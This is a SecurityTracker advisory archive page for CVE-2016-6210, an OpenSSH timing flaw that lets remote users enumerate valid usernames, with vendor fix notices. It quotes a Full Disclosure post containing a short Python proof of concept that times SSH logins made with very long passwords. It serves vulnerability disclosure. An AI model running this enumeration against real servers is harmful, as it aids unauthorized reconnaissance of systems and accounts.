SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (VPN)  >   OpenSSH Vendors:   OpenSSH.org
OpenSSH Lets Remote Users Determine Valid Usernames on the Target System
SecurityTracker Alert ID:  1036319
SecurityTracker URL:  http://securitytracker.com/id/1036319
CVE Reference:   CVE-2016-6210   (Links to External Site)
Updated:  Aug 1 2016
Original Entry Date:  Jul 16 2016
Impact:   Disclosure of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 7.2p2; possibly prior versions
Description:   A vulnerability was reported in OpenSSH. A remote user can determine valid usernames on the target system.

A remote user can send a specially crafted request with a large password (approximately 10,000 characters) to the target ssh daemon to determine valid usernames on the target system. On systems where a valid user's password has been hashed with SHA256/SHA512, the response time will be shorter for a non-existent username than for a valid username.

Eddie Harari reported this vulnerability.

Impact:   A remote user can determine valid usernames on the target system.
Solution:   The vendor has issued a fix (7.3).

The vendor advisory is available at:

http://www.openssh.com/txt/release-7.3

Vendor URL:  www.openssh.com/txt/release-7.3 (Links to External Site)
Cause:   State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Aug 15 2016 (Ubuntu Issues Fix) OpenSSH Lets Remote Users Determine Valid Usernames on the Target System
Ubuntu has issued a fix for Ubuntu Linux 12.04 LTS, 14.04 LTS, and 16.04 LTS.
Sep 24 2016 (IBM Issues Fix for IBM AIX) OpenSSH Lets Remote Users Determine Valid Usernames on the Target System
IBM has issued a fix for IBM AIX 5.3, 6.1, 7.1, and 7.2.
Dec 2 2016 (Palo Alto Networks Issues Fix for Palo Alto PAN-OS) OpenSSH Lets Remote Users Determine Valid Usernames on the Target System
Palo Alto Networks has issued a fix for Palo Alto PAN-OS.
Aug 31 2017 (Red Hat Issues Fix) OpenSSH Lets Remote Users Determine Valid Usernames on the Target System
Red Hat has issued a fix for Red Hat Enterprise Linux 6.
Jan 12 2018 (IBM Issues Fix for IBM Security Access Manager Appliance) OpenSSH Lets Remote Users Determine Valid Usernames on the Target System
IBM has issued a fix for IBM Security Access Manager Appliance.



 Source Message Contents

Subject:  [FD] opensshd - user enumeration

Sorry for the resend, I change the format of the email to better fit the list...

--------------------------------------------------------------------
User Enumeration using Open SSHD (<=Latest version).
-------------------------------------------------------------------

Abstract:
-----------
By sending large passwords, a remote user can enumerate users on system that runs SSHD. This problem exists in most modern configuration due to the fact that it takes much longer to calculate SHA256/SHA512 hash than BLOWFISH hash.

CVE-ID
---------
CVE-2016-6210

Tested versions
--------------------
This issue was tested on : opensshd-7.2p2 ( should be possible on most earlier versions as well).

Fix
-----------------
This issue was reported to OPENSSH developer group and they have sent a patch ( don't know if patch was released yet).
(thanks  to  'dtucker@zip.com.au' for his quick reply and fix suggestion).

Details
----------------
When SSHD tries to authenticate a non-existing user, it will pick up a fake password structure hardcoded in the SSHD source code. On this hard coded  password  structure  the password hash is based on BLOWFISH ($2) algorithm.
If real users passwords are hashed using SHA256/SHA512, then sending large passwords (10KB)  will result in shorter response time from the server for non-existing users.

Sample code:
----------------
import paramiko
import time
user=raw_input("user: ")
p='A'*25000
ssh = paramiko.SSHClient()
starttime=time.clock()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
        ssh.connect('127.0.0.1', username=user,
        password=p)
except:
        endtime=time.clock()
total=endtime-starttime
print(total)

(Valid users will result in higher total time).

*** please note that if SSHD configuration prohibits root login , then root is not considered as valid user...

*** when TCP timestamp option is enabled the best way to measure the time would be using timestamps from the TCP packets of the server, since this will eliminate any network delays on the way.

Eddie Harari ,


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC